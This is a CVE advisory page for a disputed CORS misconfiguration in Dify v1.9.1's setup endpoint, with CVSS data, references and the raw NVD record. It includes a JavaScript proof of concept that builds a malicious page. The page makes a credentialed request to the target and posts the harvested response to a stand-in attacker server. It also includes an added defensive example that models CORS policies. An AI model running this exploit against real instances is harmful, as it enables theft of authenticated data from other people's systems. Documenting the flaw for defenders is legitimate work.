Security Vulnerability Report
CVE-2025-63386 CVSS 9.1 CRITICAL


Published: 2025-12-18 16:15:55
Last Modified: 2026-02-11 15:16:16

Description

A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/setup endpoint. The endpoint implements an insecure CORS policy that reflects any Origin header and enables Access-Control-Allow-Credentials: true, permitting arbitrary external domains to make authenticated requests. NOTE: the Supplier disputes this because the endpoint configuration is intentional to support bootstrap.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:langgenius:dify:1.9.1:*:*:*:*:node.js:*:* - VULNERABLE
Dify v1.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-63386 PoC - CORS Misconfiguration in Dify /console/api/setup
// This PoC demonstrates how an attacker can exploit the CORS vulnerability
const fetch = require('node-fetch'); // CommonJS require, to match module.exports below

const targetUrl = 'https://target-dify-instance.com';
const attackerServer = 'https://attacker-controlled-server.com';

// Step 1: Create a malicious page that triggers the CORS request
const maliciousPage = `
<!DOCTYPE html>
<html>
<head>
  <title>Loading...</title>
</head>
<body>
<script>
  // Set the attacker's origin
  const attackerOrigin = '${attackerServer}';

  // Make authenticated request to vulnerable endpoint
  fetch('${targetUrl}/console/api/setup', {
    method: 'GET',
    credentials: 'include', // Include cookies for authenticated requests
    headers: { 'Origin': attackerOrigin }
  })
    .then(response => {
      // Check if CORS allows the request with credentials
      const acao = response.headers.get('Access-Control-Allow-Origin');
      const acac = response.headers.get('Access-Control-Allow-Credentials');
      console.log('Access-Control-Allow-Origin:', acao);
      console.log('Access-Control-Allow-Credentials:', acac);
      if (acao === attackerOrigin && acac === 'true') {
        // Vulnerable! Can exfiltrate data
        return response.json();
      }
    })
    .then(data => {
      // Exfiltrate sensitive data to attacker's server
      if (data) {
        fetch(attackerOrigin + '/collect', {
          method: 'POST',
          body: JSON.stringify(data),
          credentials: 'include'
        });
      }
    })
    .catch(error => console.error('Error:', error));
</script>
</body>
</html>
`;

// Step 2: Verify CORS misconfiguration with a preflight request from the attacker origin
async function verifyVulnerability() {
  try {
    const response = await fetch(`${targetUrl}/console/api/setup`, {
      method: 'OPTIONS',
      headers: {
        'Origin': attackerServer,
        'Access-Control-Request-Method': 'GET',
        'Access-Control-Request-Headers': 'content-type,authorization'
      }
    });
    const acao = response.headers.get('Access-Control-Allow-Origin');
    const acac = response.headers.get('Access-Control-Allow-Credentials');
    console.log('=== CVE-2025-63386 Vulnerability Check ===');
    console.log('Target:', targetUrl);
    console.log('Access-Control-Allow-Origin:', acao);
    console.log('Access-Control-Allow-Credentials:', acac);
    if (acao === attackerServer && acac === 'true') {
      console.log('[VULNERABLE] CORS misconfiguration detected!');
      console.log('Arbitrary origins are allowed with credentials.');
    } else {
      console.log('[SAFE] CORS policy appears to be properly configured.');
    }
  } catch (error) {
    console.error('Error verifying vulnerability:', error.message);
  }
}

verifyVulnerability();

module.exports = { maliciousPage, verifyVulnerability };
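As an added, defender-side example that is not part of the advisory, the PoC above, or the Dify code base: a small JavaScript model of the two CORS policies in play, the reflecting policy the description attributes to /console/api/setup and an allowlist policy, plus a classifier for the response headers a probe receives. All origins in it are constructed placeholders.

```javascript
// Added example (not from the advisory or the Dify project). Models the CORS
// headers a server emits for a given Origin and classifies what a probe sees.

// Weak policy the advisory describes: echo whatever Origin arrives and always
// grant credentials, so any site can make cookie-authenticated reads.
function reflectingCorsHeaders(requestOrigin) {
  return {
    'access-control-allow-origin': requestOrigin,
    'access-control-allow-credentials': 'true',
  };
}

// Hardened policy: echo the Origin only if it is on an explicit allowlist and
// add Vary: Origin so a cache never serves one origin's grant to another.
// Unknown origins get no CORS headers, so the browser withholds the body.
function allowlistCorsHeaders(requestOrigin, allowedOrigins) {
  if (!allowedOrigins.includes(requestOrigin)) return {};
  return {
    'access-control-allow-origin': requestOrigin,
    'access-control-allow-credentials': 'true',
    vary: 'Origin',
  };
}

// Classifies headers returned to a probe. probeOrigin must be an origin the
// server has no reason to trust: a trusted origin being echoed is expected
// behaviour and would look identical to reflection.
function classifyCors(headers, probeOrigin) {
  const acao = headers['access-control-allow-origin'];
  const acac = headers['access-control-allow-credentials'];
  if (acao === undefined) return 'no-cors';
  if (acao === probeOrigin) {
    return acac === 'true' ? 'reflecting-with-credentials' : 'reflecting';
  }
  if (acao === '*') return 'wildcard'; // browsers refuse '*' with credentials
  return 'restricted';                  // a fixed origin other than the probe
}

// Runs one probe against each policy with a constructed untrusted origin.
function demo() {
  const probe = 'https://untrusted.example';          // constructed
  const allowed = ['https://console.dify.example'];   // constructed allowlist
  return {
    reflecting: classifyCors(reflectingCorsHeaders(probe), probe),
    allowlist: classifyCors(allowlistCorsHeaders(probe, allowed), probe),
    allowlistTrusted: classifyCors(allowlistCorsHeaders(allowed[0], allowed), probe),
  };
}
console.log(demo());
```

Only the reflecting policy yields `reflecting-with-credentials` for an untrusted probe; the allowlist policy yields `no-cors` for it and `restricted` when the echoed origin is a trusted one.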

References

https://gist.github.com/Cristliu/1610daac87c711ac3e0250c58f5cc4f9 (Third Party Advisory)
https://gist.github.com/Cristliu/8ad993126be05c9210c71cc7d49fa112
https://github.com/langgenius/dify/discussions (Issue Tracking)
https://github.com/langgenius/dify/pull/32224

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63386", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:54.533", "lastModified": "2026-02-11T15:16:16.123", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "A Cross-Origin Resource Sharing (CORS) misconfiguration vulnerability exists in Dify v1.9.1 in the /console/api/setup endpoint. The endpoint implements an insecure CORS policy that reflects any Origin header and enables Access-Control-Allow-Credentials: true, permitting arbitrary external domains to make authenticated requests. NOTE: the Supplier disputes this because the endpoint configuration is intentional to support bootstrap."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": 
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langgenius:dify:1.9.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "ABF9FC69-C390-446E-830C-5F8B0A0488F2"}]}]}], "references": [{"url": "https://gist.github.com/Cristliu/1610daac87c711ac3e0250c58f5cc4f9", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gist.github.com/Cristliu/8ad993126be05c9210c71cc7d49fa112", "source": "[email protected]"}, {"url": "https://github.com/langgenius/dify/discussions", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/langgenius/dify/pull/32224", "source": "[email protected]"}]}}